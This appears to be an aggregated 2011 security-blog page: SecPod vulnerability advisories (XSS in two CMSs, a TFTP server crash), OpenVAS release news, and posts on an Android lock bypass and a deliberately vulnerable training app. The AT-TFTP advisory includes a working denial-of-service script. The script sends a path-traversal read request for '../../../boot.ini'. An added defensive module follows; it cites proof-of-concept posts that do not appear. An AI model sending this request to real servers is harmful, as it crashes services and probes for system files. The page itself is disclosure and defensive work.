S40 Content Management System (CMS) v0.4.2 beta Cross-Site Scripting Vulnerability

SecPod Research Team member (Antu Sanadi) has found a cross-site scripting vulnerability in S40 Content Management System (CMS). Input passed via the ‘gsearchfield’ parameter in ‘index.php’ is not properly verified before it is returned to the user. This may allow an attacker to steal cookie-based authentication credentials or inject arbitrary HTML code.

More information can be found here.

by Veerendra GG at July 08, 2011 06:29 AM

July 06, 2011

OpenVAS

OpenVAS DevCon #3 : Starting tomorrow

For the third time, the OpenVAS team meets in real life to discuss and plan the next features of the OpenVAS framework. OpenVAS DevCon #3 takes place in Osnabrück, Germany, from 7 to 9 July 2011. Greenbone Networks GmbH kindly hosts the developer conference at their offices:
Neuer Graben 17
49074 Osnabrück
Germany

Anyone active as an OpenVAS developer, tester, packager or user is welcome. Check out the official devcon page. You can also still submit lightning talks; more info here.

by noreply@blogger.com (kost) at July 06, 2011 12:47 PM

April 25, 2011

SecPod Research Blog

AT-TFTP Server v1.8 Remote Denial of Service Vulnerability

SecPod Research Team member (Antu Sanadi) has found a denial-of-service vulnerability in Allied Telesyn TFTP Server. The vulnerability is caused by an error in “TFTPD.EXE” that makes the server crash when no acknowledgment is sent back to it after a successful ‘read’. The flaw can be exploited to crash a vulnerable server, denying service to legitimate users.

POC : Download here

More information can be found here.

#!/usr/bin/python

##############################################################################
# Exploit   : http://secpod.org/SecPod_AT_TFTP_DoS-POC.py
# Reference : http://secpod.org/blog/?p=194
#           : http://secpod.org/advisories/SecPod_AT_TFTP_DoS.txt
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################

import socket
import sys

## Target defaults to localhost; pass an IP address as the first argument to override
host = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except socket.error:
    print "socket() failed"
    sys.exit(1)

addr = (host, port)

## RRQ (opcode \x00\x01) for "../../../boot.ini" in netascii mode. The crash is
## triggered by never acknowledging the DATA block the server sends back.
data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
      '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, addr)
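The TFTP posts on this page (the Ipswitch, CiscoKits and Avaya traversal PoCs, the Hillstone and CiscoKits long-filename crashes, and the AT-TFTP request just above) all build the same two-byte-opcode request by hand. The Python 3 module below is an added example, not SecPod's code: it encodes and decodes RRQ/WRQ, DATA, ACK and ERROR packets so the raw replies the PoCs print can be read, and implements the server-side check those daemons lacked, refusing ‘..’ components in either slash style, empty or overlong names and unknown transfer modes before touching the filesystem. The MAX_FILENAME limit and the /tftproot root are assumptions for the example; the sample requests are constructed, including a decode of the exact bytes the AT-TFTP PoC sends.

```python
import posixpath
import struct

# TFTP opcodes (RFC 1350)
OP_RRQ, OP_WRQ, OP_DATA, OP_ACK, OP_ERROR = 1, 2, 3, 4, 5
VALID_MODES = ("netascii", "octet", "mail")
MAX_FILENAME = 255   # assumed limit for the hardened server; not taken from the advisories


def build_request(opcode, filename, mode="octet"):
    """Encode an RRQ/WRQ the way the PoCs on this page do:
    2-byte opcode, NUL-terminated filename, NUL-terminated mode."""
    if opcode not in (OP_RRQ, OP_WRQ):
        raise ValueError("opcode must be RRQ or WRQ")
    return (struct.pack("!H", opcode) + filename.encode("latin-1") + b"\x00"
            + mode.encode("latin-1") + b"\x00")


def parse_request(packet):
    """Decode an RRQ/WRQ into (opcode, filename, mode). Raises on malformed
    input instead of reading past the buffer, which is where crashes start."""
    if len(packet) < 4:
        raise ValueError("truncated request")
    opcode = struct.unpack("!H", packet[:2])[0]
    if opcode not in (OP_RRQ, OP_WRQ):
        raise ValueError("not a request opcode: %d" % opcode)
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3:
        raise ValueError("filename or mode not NUL-terminated")
    return opcode, fields[0].decode("latin-1"), fields[1].decode("latin-1").lower()


def parse_response(packet):
    """Decode a server reply: DATA -> (3, block, payload), ACK -> (4, block, b''),
    ERROR -> (5, errcode, message). The PoCs print this raw; the 4-byte header
    in front of the file contents is why."""
    if len(packet) < 4:
        raise ValueError("truncated reply")
    opcode, arg = struct.unpack("!HH", packet[:4])
    if opcode == OP_DATA:
        return opcode, arg, packet[4:]
    if opcode == OP_ACK:
        return opcode, arg, b""
    if opcode == OP_ERROR:
        return opcode, arg, packet[4:].split(b"\x00")[0]
    raise ValueError("unexpected opcode %d" % opcode)


def resolve_safe(root, filename, mode="octet"):
    """The server-side check the vulnerable daemons lacked. Returns the path
    under root for a legitimate request, or None when it must be refused:
    overlong names (the Hillstone/CiscoKits crash input), unknown modes,
    empty names, and any '..' component (the traversal input)."""
    if not filename or len(filename) > MAX_FILENAME or mode not in VALID_MODES:
        return None
    # Windows daemons accept both separators, so normalise before splitting
    parts = [p for p in filename.replace("\\", "/").split("/") if p not in ("", ".")]
    if not parts or any(p == ".." for p in parts):
        return None
    root = root.rstrip("/")
    resolved = posixpath.normpath(posixpath.join(root, *parts))
    return resolved if resolved.startswith(root + "/") else None


def check_request(root, packet):
    """Parse a raw request and run it through resolve_safe: (opcode, path or None)."""
    opcode, filename, mode = parse_request(packet)
    return opcode, resolve_safe(root, filename, mode)


if __name__ == "__main__":
    # constructed inputs: the RRQ the Ipswitch/Avaya PoCs send, and a benign one
    for req in (build_request(OP_RRQ, "../" * 10 + "boot.ini", "netascii"),
                build_request(OP_RRQ, "configs/router1.cfg")):
        print(parse_request(req), "->", check_request("/tftproot", req))
```

Rejecting any ‘..’ component outright is stricter than normalising and then comparing prefixes, and deliberately so: a name such as a/../../x normalises to something inside the root on one platform and outside it on another, and a TFTP client has no legitimate reason to send one.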

We welcome any feedback or suggestions.

Cheers!
SecPod Research Team

by Veerendra GG at April 25, 2011 08:17 AM

March 31, 2011

SecPod Research Blog

AR Web Content Manager (AWCM) Cross-Site scripting Vulnerability

SecPod Research Team member (Antu Sanadi) has found an XSS flaw in AR Web Content Manager (AWCM), which can be used to obtain sensitive information and launch further attacks. The flaw lies in the ‘search’ parameter of ‘search.php’: the application renders the user-supplied input back to the client’s browser without sanitising it. The flaw can be exploited to inject arbitrary HTML code, steal cookies and so on.

The solution can be found here.

More information can be found here.

by Veerendra GG at March 31, 2011 12:02 PM

February 15, 2011

Nth Dimension/:: Negatively discriminating against idiots since 1995!

Bypassing the Android pattern lock

At the back end of last year I got a Sony Ericsson X10 only to discover that it was still running Android 1.6. This didn't bother me too much at the time as it had all the features I was after (web, SMS and voice) and I left it as it was. Recently however I've been getting into Android security, inspired first by Nils' talk at CRESTCon and more recently by some for a client. Anyway, throughout this time, I became aware of an issue that affects the X10. It seems that it is possible to bypass the pattern lock and gain access to data on a locked device. So how is this possible? Take a look at the following:...

by timb@machine.org.uk (Tim Brown) at February 15, 2011 11:09 PM

February 12, 2011

Nth Dimension/:: Negatively discriminating against idiots since 1995!

Introducing VulnApp

Recently a colleague and I were asked to give some training to some ASP.net developers. My colleague was asked to give the main training session whilst I was asked to run a post-training game to test the developers' retention of the concepts. After looking at some of the existing ASP.net applications I decided I'd like to write my own. The result of this is VulnApp, a BSD-licensed ASP.net application implementing some of the most common applications we come across on our penetration testing engagements. Whilst I'm not intending to package this up into a standalone install, today I committed the source to my CVS server so that others can, if they like, make use of it....

by timb@machine.org.uk (Tim Brown) at February 12, 2011 08:22 PM

January 17, 2011

OpenVAS

OpenVAS Administrator 1.0.1 released

The OpenVAS developers are happy to announce the first maintenance release for the 1.0 series of the Administrator module for the Open Vulnerability Assessment System (OpenVAS).

It improves LDAP-based authentication and adds self-documentation feature for the OpenVAS Administration Protocol (OAP) 1.0.

Many thanks to everyone who has contributed to this release: Matthew Mundell, Michael Wiegand, Jan-Oliver Wagner and Felix Wolfsteller.

Main changes since 1.0.0:
* Fixed behaviour for ldap-based authentication for Admin role.
* Added protocol documentation for OAP (HTML and RNC format, can be built with "make doc").
* Code hardening at compile time is now the default.
* Harmonized output of "--version" with other modules.

The source tarball for this release is available for download from the OpenVAS website at http://www.openvas.org/. Binary packages for major GNU/Linux distributions by third parties are expected in the following weeks.

by noreply@blogger.com (kost) at January 17, 2011 11:53 PM